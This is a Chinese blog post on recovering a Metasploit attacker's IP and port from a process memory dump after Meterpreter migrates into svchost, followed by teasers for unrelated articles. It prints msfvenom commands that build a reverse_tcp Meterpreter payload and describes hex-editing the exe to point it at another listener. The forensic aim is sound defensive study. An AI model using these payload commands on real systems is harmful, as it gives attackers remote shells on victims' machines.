msf原生shellcode迁移进程后如何获取攻击者ip

msf原生shellcode迁移进程后如何获取攻击者ip仅为ip及端口
木有图,看一下就晓得了
偶尔看到了这个问题,做了一些倒推测试之后得出来的结果

倒推过程
shellcode
msf生成一段shellcode,产生的一组16进制数据

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f c

产生的16进制数据会带有ip以及端口信息,直接将ip和端口转换为16进制 c0 a8 9d 0d 0457,然后ctrf+f大法可以直接搜索到对应位置
在产生的文件中是以 0457 c0a8 9d0d 显示的

生成exe格式

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f exe -o shell.exe

使用od展开shell.exe

od -x shell.exe

然后继续使用ctrf+f大法,会发现exe中的ip端口是以 a8c0 0d9d 5704 排列的,那么进入到正文

创建监听,将生成的exe丢到目标机上以管理员身份运行,迁移进程 migrate 这里以svchost为例,迁移之后,使用任务管理器找到对应的pid创建转储文件,会生成svchost.dmp文件,依旧老套路

od -x scvhost.dmp  

以16进制打开 使用ctrf+f大法直接搜索a8 (c0太多了,看不过来)

其实这里的shellcode也是以 a8c0 0d9d 5704 排列

那么找一个在线16进制编译器,将上文生成的shell.exe的a8c0 0d9d 5704 修改为另外一个kali监听的ip以及端口,正常执行后也是可以获取倒shell的

但是,这都是倒推,已经有了攻击者ip以及端口进行反向查找

正向推断,有以下几个问题

如果获取到的dmp文件内容全部转换为10进制,那么全都是数字,无法进行有效识别

如果不确定迁移的进程位置是否需要整个操作系统dump内存进行查到,又会回到第一个问题

问过带佬后,得出一个可能可行的路线

卡巴斯基内存扫描获取木马签名,使用Volatility进行yara规则匹配,然后dump内存,转换为10进制

首先让不让安装卡巴另说,操作系统dump也忒大了

当然了 通过查看网络连接等其他方式也是可以获取到攻击者ip以及端口的

有别的想法的老哥可以私信

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/852131.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Ubuntu下使用`sysbench`来测试CPU性能

使用 sysbench 来测试 CPU 性能是一个常见的方法。sysbench 是一个模块化的跨平台基准测试工具,常用于评估系统的各个组件(例如 CPU、内存、I/O 子系统等)的性能。 下面是如何使用 sysbench 来测试 CPU 性能的基本步骤: 1. 安装…

车载电子电气架构 - 智能座舱技术及功能应用

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 屏蔽力是信息过载时代一个人的特殊竞争力,任何消耗你的人和事,多看一眼都是你的不对。非必要不费力证明自己,无利益不试图说服别人,是精神上的节…

论文解读——《I2EDL: Interactive Instruction Error Detection and Localization》

一、研究背景 视觉与语言导航(VLN)是一个AI领域的研究任务,旨在开发能够按照自然语言指令在三维空间中导航到指定位置的智能体。这项任务与人类的日常活动——如按照口头指示到达某个地点——十分相似,对于推动人机交互的自然性和…

【学习笔记9】一些遇到的如何写code的问题

一、计算e(x): import math result math.exp(x)import numpy as np result np.exp(x)二、matplotlib.pyplot坐标无法显示中文: plt.rcParams[font.family] [sans-serif] plt.rcParams[font.sans-serif] [SimHei]三、matplotlib.pyplot横纵坐标无法…

【智能算法应用】基于混合粒子群-蚁群算法的多机器人多点送餐路径规划问题

目录 1.算法原理2.数学模型3.结果展示4.参考文献5.代码获取 1.算法原理 【智能算法】粒子群算法(PSO)原理及实现 配餐顺序: 采用混合粒子群算法 || 路径规划: 采用蚁群算法 2.数学模型 餐厅送餐多机器人多点配送路径规划&…

配置应用程序的服务和请求处理管道 为啥要在starup而不再program中配置呢

配置应用程序的服务和请求处理管道通常在Startup类中完成,而不是在Program类中,主要基于以下原因: 关注点分离: Program.cs主要关注于应用程序的启动和宿主的构建。它负责初始化应用程序的主机,并设置基本的配置和启动…

linux系统——wget命令

wget命令可以用于下载指定的url地址文件,支持断点续传,支持ftp,http协议下载,在下载普通文件时,即使网络出现故障,依然会不断尝试下载 wget命令直接加url地址 使用-o参数可以将下载文件改名,-c…

【AI】DeepStream(11):deepstream-app源码详解(03)解析配置文件

【AI】AI学习目录汇总 上一篇:【AI】DeepStream(10):deepstream-app源码详解(02)配置文件格式详解 1、简述 deepstream-app的 txt 配置文件,为INI格式,使用 GLib 的 GKeyFile 来解析INI格式的配置文件。 2、解析 application 2.1 配置参数 [application] // 性能测…

python 循环导入(circular imports)解决方法

在 Python 中,大部分人都应该都遇到过循环导入的问题。 循环导入是指两个文件各自尝试导入另一个文件(模块),当一个模块没有完全初始化时会导致失败。解决这种情况的最好方法是将代码分层组织,这样导入的关系就会自然…

Java基础 - 多线程

多线程 创建新线程 实例化一个Thread实例,然后调用它的start()方法 Thread t new Thread(); t.start(); // 启动新线程从Thread派生一个自定义类,然后覆写run()方法: public class Main {public static void main(String[] args) {Threa…

AXI Quad SPI IP核中的STARTUPEn原语参数

启动STARTUPEn Primitive (原语)参数在 FPGA的主 SPI模式下非常有用。当你启用这个参数时,对于 7 系列设备,STARTUPE2 原语会被包含在设计中;而对于 UltraScale™ 设备,则是 STARTUPE3 原语。这些原语在 FP…

CentOS手工升级curl记

笔者一台服务器装有 CentOS 7.9 系统,运行 curl -V 查询 curl 的版本是 7.29,这个老版本的 curl 不支持 HTTP/2 协议。为了使 curl 能连接HTTP/2,curl 必须升级到至少7.46.0版本以上。查询 curl的官网得知当前最新版本是 8.8.0,然…

【ZZULIOJ】1104: 求因子和(函数专题)

题目描述 输入正整数n&#xff08;2<n<1000&#xff09;&#xff0c;计算并输出n的所有正因子(包括1&#xff0c;不包括自身)之和。要求程序定义一个FacSum ()函数和一个main()函数&#xff0c;FacSum ()函数计算并返回n的所有正因子之和&#xff0c;其余功能在main()函…

Kubernetes(K8s)从入门到精通系列之十九:Operator模式

Kubernetes K8s从入门到精通系列之十九&#xff1a;Operator模式 一、动机二、Operators in Kubernetes三、Operator示例四、部署Operator五、使用Operator六、编写自己的operator Operator 是 Kubernetes 的软件扩展&#xff0c;它利用自定义资源来管理应用程序及其组件。 Ope…

49. 简单数字加密

Description 实现一个加密函数&#xff0c;对输入的4位数字进行加密&#xff0c;并输出加密结果。加密规则如下&#xff1a; 对每一位数字都利用该数字对应的ASCII编码加上5&#xff0c;然后用除以10的余数代替该数字。将第一位和第四位交换&#xff0c;第二位和第三位交换。…

【智能算法应用】基于粒子群算法的多尺度Retinex图像去雾方法

目录 1.算法原理2.粒子群算法的多尺度Retinex图像去雾方法3.结果展示4.参考文献5.代码获取 1.算法原理 【智能算法】粒子群算法&#xff08;PSO&#xff09;原理及实现 多尺度Retinex算法 在Retinex算法中&#xff0c;雾化图像的形成可以总结为入射光和反射光的乘积: I ( x…

第 3 章:Spring Framework 中的 AOP

第 3 章&#xff1a;Spring Framework 中的 AOP 讲完了 IoC&#xff0c;我们再来聊聊 Spring Framework 中的另一个重要内容——面向切面编程&#xff0c;即 AOP。它是框架中众多功能的基础&#xff0c;例如声明式事务就是依靠 AOP 来实现的。此外&#xff0c;Spring 还为我们…

代码详解工厂设计模式【2】

文章1暴露了简单工厂模式的一些局限性。为了解决这些问题&#xff0c;我们可以使用工厂方法模式&#xff0c;它更好地遵循了开闭原则&#xff08;对扩展开放&#xff0c;对修改封闭&#xff09;。在工厂方法模式中&#xff0c;我们为每种产品提供一个工厂类&#xff0c;这样就避…

创邻科技张晨:期待解锁图技术在供应链中的关联力

近日&#xff0c;创邻科技创始人兼CEO张晨博士受浙江省首席信息官协会邀请&#xff0c;参加数字化转型与企业出海研讨会。 此次研讨会旨在深入探讨数字经济时代下&#xff0c;企业如何有效应对成本提升与环境变化所带来的挑战&#xff0c;通过数字化转型实现提效增益&#xff…

4090显卡 安装cuda 11.3 版本

文章目录 cuda 安装安装过程中会要求选择安装的内容更改cuda地址到你安装的地方 cuda 安装 cuda官网寻找cuda11.3 版本 https://developer.nvidia.com/cuda-11.3.0-download-archive?target_osLinux&target_archx86_64&DistributionUbuntu&target_version20.04&…